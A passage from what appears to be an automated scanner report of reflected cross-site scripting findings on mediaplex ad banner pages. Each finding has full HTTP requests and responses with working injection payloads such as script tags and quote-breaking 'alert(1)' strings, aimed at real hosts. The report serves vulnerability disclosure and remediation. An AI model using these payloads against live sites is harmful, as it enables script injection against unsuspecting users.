GET /content/0/14741/120372/GX1041_AugBanner_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D9243697&mpt=9243697&mpvc=http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=368e1"><script>alert(1)</script>12c7fa4208a HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/APM/iview/352572792/direct;/01?click= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 12:52:00 GMT Server: Apache Last-Modified: Tue, 16 Aug 2011 19:18:59 GMT ETag: "5d7df9-115a-4aaa4406baec0" Accept-Ranges: bytes Content-Length: 5298 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=368e1"><script>alert(1)</script>12c7fa4208ahttp://altfarm.mediaplex.com/ad/ck/14741-120372-2060-51?mpt=9243697" target="_blank"> ...[SNIP]...
|
5.47. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpck parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html |
Issue detail
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcf78"-alert(1)-"ce92a136ff1 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5Dbcf78"-alert(1)-"ce92a136ff1&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:18:57 GMT Server: Apache Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT ETag: "7e9e6e-129f-4a98adcb0d500" Accept-Ranges: bytes Content-Length: 5568 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]bcf78"-alert(1)-"ce92a136ff1" t ...[SNIP]... <mpcke/>'; if (mpcke == 1) { mpcclick = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5Dbcf78"-alert(1)-"ce92a136ff1"); mpck = "http://" + mpcclick; } else if (mpcke == 2) { mpcclick2 = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5Dbcf78"-alert(1)-"ce92a136ff1 ...[SNIP]...
|
5.48. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpck parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html |
Issue detail
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 489ce"><script>alert(1)</script>fc8c9872635 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D489ce"><script>alert(1)</script>fc8c9872635&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:18:57 GMT Server: Apache Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT ETag: "7e9e6e-129f-4a98adcb0d500" Accept-Ranges: bytes Content-Length: 5643 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]489ce"><script>alert(1)</script>fc8c9872635" target="_blank"> ...[SNIP]...
|
5.49. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpck parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html |
Issue detail
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a4e1'%3balert(1)//fb1d5d0e816 was submitted in the mpck parameter. This input was echoed as 5a4e1';alert(1)//fb1d5d0e816 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D5a4e1'%3balert(1)//fb1d5d0e816&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:18:57 GMT Server: Apache Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT ETag: "7e9e6e-129f-4a98adcb0d500" Accept-Ranges: bytes Content-Length: 5574 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]5a4e1';alert(1)//fb1d5d0e816" t ...[SNIP]... <a href="http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]5a4e1';alert(1)//fb1d5d0e816" target="_blank"> ...[SNIP]...
|
5.50. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpjs parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html |
Issue detail
The value of the mpjs request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d3e1"%3balert(1)//93fc47cfcae was submitted in the mpjs parameter. This input was echoed as 8d3e1";alert(1)//93fc47cfcae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D161611314842790928d3e1"%3balert(1)//93fc47cfcae&mpt=[555223779ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:18:58 GMT Server: Apache Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT ETag: "7e9e6e-129f-4a98adcb0d500" Accept-Ranges: bytes Content-Length: 5456 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]" target="_blank"><img src="htt ...[SNIP]... me=&adnet=&dvtagver=3.3.1346.2176&adsrv=8&plc=16161131484279092&advid=421303&sid=16161131484279092&adid= img-cdn.mediaplex.com/0/16161/Nielsen_pixel.js?campid=133016&crid=8029877&plid=161611314842790928d3e1";alert(1)//93fc47cfcae").split( " " ); for( var i = 0; i < mpjs.length; i++ ) { document.write( "<" + "script type=\"text/javascript\" src=\"http://" + mpjs[i]+ "\"> ...[SNIP]...
|
5.51. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpvc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html |
Issue detail
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97a01'%3balert(1)//a5343286805 was submitted in the mpvc parameter. This input was echoed as 97a01';alert(1)//a5343286805 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc=97a01'%3balert(1)//a5343286805 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:18:58 GMT Server: Apache Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT ETag: "7e9e6e-129f-4a98adcb0d500" Accept-Ranges: bytes Content-Length: 5570 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="97a01';alert(1)//a5343286805http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]" t ...[SNIP]... <a href="97a01';alert(1)//a5343286805http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]" target="_blank"> ...[SNIP]...
|
5.52. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpvc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html |
Issue detail
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb1ae"%3balert(1)//dabd418c3c5 was submitted in the mpvc parameter. This input was echoed as bb1ae";alert(1)//dabd418c3c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc=bb1ae"%3balert(1)//dabd418c3c5 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:18:58 GMT Server: Apache Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT ETag: "7e9e6e-129f-4a98adcb0d500" Accept-Ranges: bytes Content-Length: 5570 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="bb1ae";alert(1)//dabd418c3c5http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]" t ...[SNIP]... <mpvce/>'; if (mpvce == 1) { mpvclick = encodeURIComponent("bb1ae";alert(1)//dabd418c3c5"); mpvc = mpvclick; } else if (mpvce == 2) { mpvclick2 = encodeURIComponent("bb1ae";alert(1)//dabd418c3c5"); mpvc = encodeURIComponent(mpvclick2); } else { mpvc = ("bb1ae"%3balert(1)//dabd4 ...[SNIP]...
|
5.53. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpvc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html |
Issue detail
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7611"><script>alert(1)</script>912217c74dc was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc=d7611"><script>alert(1)</script>912217c74dc HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:18:58 GMT Server: Apache Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT ETag: "7e9e6e-129f-4a98adcb0d500" Accept-Ranges: bytes Content-Length: 5643 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="d7611"><script>alert(1)</script>912217c74dchttp://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]" target="_blank"> ...[SNIP]...
|
5.54. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpck parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html |
Issue detail
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 675f8"-alert(1)-"1ff134b311f was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D675f8"-alert(1)-"1ff134b311f&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:34 GMT Server: Apache Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT ETag: "91db10-12df-4a9283e5e5c40" Accept-Ranges: bytes Content-Length: 5627 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]675f8"-alert(1)-"1ff134b311f" ...[SNIP]... <mpcke/>'; if (mpcke == 1) { mpcclick = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D675f8"-alert(1)-"1ff134b311f"); mpck = "http://" + mpcclick; } else if (mpcke == 2) { mpcclick2 = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D675f8"-alert(1)-"1ff134b311 ...[SNIP]...
|
5.55. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpck parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html |
Issue detail
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dd24'%3balert(1)//8fded395788 was submitted in the mpck parameter. This input was echoed as 5dd24';alert(1)//8fded395788 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D5dd24'%3balert(1)//8fded395788&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:37:34 GMT Server: Apache Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT ETag: "91db10-12df-4a9283e5e5c40" Accept-Ranges: bytes Content-Length: 5633 Content-Type: text/html; charset=ISO-8859-1
<html> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]5dd24';alert(1)//8fded395788" ...[SNIP]... <a href="http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]5dd24';alert(1)//8fded395788" target="_blank"> ...[SNIP]...
|
5.56. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpck parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
